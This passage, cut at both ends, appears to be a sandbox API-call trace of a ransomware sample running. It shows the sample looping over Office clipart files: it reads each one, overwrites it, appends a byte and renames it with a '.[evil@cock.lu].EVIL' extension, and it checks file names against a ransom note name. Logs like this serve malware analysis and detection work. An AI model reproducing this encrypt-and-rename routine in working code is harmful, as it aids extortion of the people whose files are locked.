_Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 69 [0119.930] wcscmp (_String1="ED00019_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0119.930] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ED00019_.WMF") returned 0x0 [0119.930] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 0x45 [0119.930] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00019_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0119.932] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x32f2, lpOverlapped=0x0) returned 1 [0119.934] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.934] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.934] _errno () returned 0x84b1160840 [0119.934] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.934] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x3300, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3300, lpOverlapped=0x0) returned 1 [0119.935] CloseHandle (hObject=0x1a8) returned 1 [0119.935] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.935] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.935] __uncaught_exception () returned 0x84b1160800 [0119.935] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.935] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00019_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00019_.wmf.[evil@cock.lu].evil")) returned 1 [0119.936] ??_V@YAXPEAX@Z () returned 0x1 [0119.939] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF", dwFileAttributes=0x200) returned 0 [0119.939] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0119.939] wcsstr (_Str="ED00172_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0119.939] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 69 [0119.939] wcscmp (_String1="ED00172_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0119.939] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ED00172_.WMF") returned 0x0 [0119.939] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 0x45 [0119.939] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0119.941] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa8c, lpOverlapped=0x0) returned 1 [0119.958] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.958] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.958] _errno () returned 0x84b1160840 [0119.958] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.958] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xaa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xaa0, lpOverlapped=0x0) returned 1 [0119.958] CloseHandle (hObject=0x1a8) returned 1 [0119.959] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.959] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.959] __uncaught_exception () returned 0x84b1160800 [0119.959] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.959] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00172_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00172_.wmf.[evil@cock.lu].evil")) returned 1 [0119.960] ??_V@YAXPEAX@Z () returned 0x1 [0119.964] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF", dwFileAttributes=0x200) returned 0 [0119.964] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0119.964] wcsstr (_Str="ED00184_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0119.964] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 69 [0119.964] wcscmp (_String1="ED00184_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0119.964] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ED00184_.WMF") returned 0x0 [0119.964] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 0x45 [0119.964] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0119.966] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1b2e, lpOverlapped=0x0) returned 1 [0119.969] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.969] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.969] _errno () returned 0x84b1160840 [0119.969] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.969] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x1b40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b40, lpOverlapped=0x0) returned 1 [0119.969] CloseHandle (hObject=0x1a8) returned 1 [0119.969] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.969] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.969] __uncaught_exception () returned 0x84b1160800 [0119.969] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.969] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00184_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00184_.wmf.[evil@cock.lu].evil")) returned 1 [0119.970] ??_V@YAXPEAX@Z () returned 0x1 [0119.973] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF", dwFileAttributes=0x200) returned 0 [0119.973] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0119.973] wcsstr (_Str="EN00006_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0119.973] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 69 [0119.973] wcscmp (_String1="EN00006_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0119.973] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="EN00006_.WMF") returned 0x0 [0119.973] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 0x45 [0119.973] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00006_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0119.975] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3670, lpOverlapped=0x0) returned 1 [0119.977] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.977] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.977] _errno () returned 0x84b1160840 [0119.977] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.977] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x3680, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3680, lpOverlapped=0x0) returned 1 [0119.978] CloseHandle (hObject=0x1a8) returned 1 [0119.978] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.978] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.978] __uncaught_exception () returned 0x84b1160800 [0119.978] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.978] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00006_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00006_.wmf.[evil@cock.lu].evil")) returned 1 [0119.979] ??_V@YAXPEAX@Z () returned 0x1 [0119.981] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF", dwFileAttributes=0x200) returned 0 [0119.981] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0119.981] wcsstr (_Str="EN00202_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0119.982] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 69 [0119.982] wcscmp (_String1="EN00202_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0119.982] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="EN00202_.WMF") returned 0x0 [0119.982] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 0x45 [0119.982] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00202_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0119.983] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1b1a, lpOverlapped=0x0) returned 1 [0119.986] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.986] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.986] _errno () returned 0x84b1160840 [0119.986] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.986] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b20, lpOverlapped=0x0) returned 1 [0119.986] CloseHandle (hObject=0x1a8) returned 1 [0119.986] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.986] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.986] __uncaught_exception () returned 0x84b1160800 [0119.987] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.987] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00202_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00202_.wmf.[evil@cock.lu].evil")) returned 1 [0119.988] ??_V@YAXPEAX@Z () returned 0x1 [0119.992] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF", dwFileAttributes=0x200) returned 0 [0119.992] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0119.992] wcsstr (_Str="EN00222_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0119.992] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 69 [0119.992] wcscmp (_String1="EN00222_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0119.992] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="EN00222_.WMF") returned 0x0 [0119.992] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 0x45 [0119.992] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00222_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0119.994] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3044, lpOverlapped=0x0) returned 1 [0119.997] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.997] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.997] _errno () returned 0x84b1160840 [0119.997] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.997] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x3060, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3060, lpOverlapped=0x0) returned 1 [0119.997] CloseHandle (hObject=0x1a8) returned 1 [0119.997] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.997] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.997] __uncaught_exception () returned 0x84b1160800 [0119.997] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.998] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00222_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00222_.wmf.[evil@cock.lu].evil")) returned 1 [0119.998] ??_V@YAXPEAX@Z () returned 0x1 [0120.001] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF", dwFileAttributes=0x200) returned 0 [0120.001] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.001] wcsstr (_Str="EN00242_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.001] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 69 [0120.001] wcscmp (_String1="EN00242_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.001] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="EN00242_.WMF") returned 0x0 [0120.001] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 0x45 [0120.001] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00242_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.003] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1a7c, lpOverlapped=0x0) returned 1 [0120.006] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.006] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.006] _errno () returned 0x84b1160840 [0120.006] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.006] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x1a80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1a80, lpOverlapped=0x0) returned 1 [0120.006] CloseHandle (hObject=0x1a8) returned 1 [0120.006] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.007] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.007] __uncaught_exception () returned 0x84b1160800 [0120.007] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.007] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00242_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00242_.wmf.[evil@cock.lu].evil")) returned 1 [0120.007] ??_V@YAXPEAX@Z () returned 0x1 [0120.010] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF", dwFileAttributes=0x200) returned 0 [0120.010] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.010] wcsstr (_Str="EN00319_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.010] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 69 [0120.010] wcscmp (_String1="EN00319_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.010] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="EN00319_.WMF") returned 0x0 [0120.010] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 0x45 [0120.010] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00319_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.012] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8e8, lpOverlapped=0x0) returned 1 [0120.015] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.015] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.015] _errno () returned 0x84b1160840 [0120.015] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.015] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x900, lpOverlapped=0x0) returned 1 [0120.015] CloseHandle (hObject=0x1a8) returned 1 [0120.015] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.015] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.015] __uncaught_exception () returned 0x84b1160800 [0120.015] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.015] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00319_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00319_.wmf.[evil@cock.lu].evil")) returned 1 [0120.016] ??_V@YAXPEAX@Z () returned 0x1 [0120.019] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF", dwFileAttributes=0x200) returned 0 [0120.020] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.020] wcsstr (_Str="EN00320_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.020] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 69 [0120.020] wcscmp (_String1="EN00320_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.020] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="EN00320_.WMF") returned 0x0 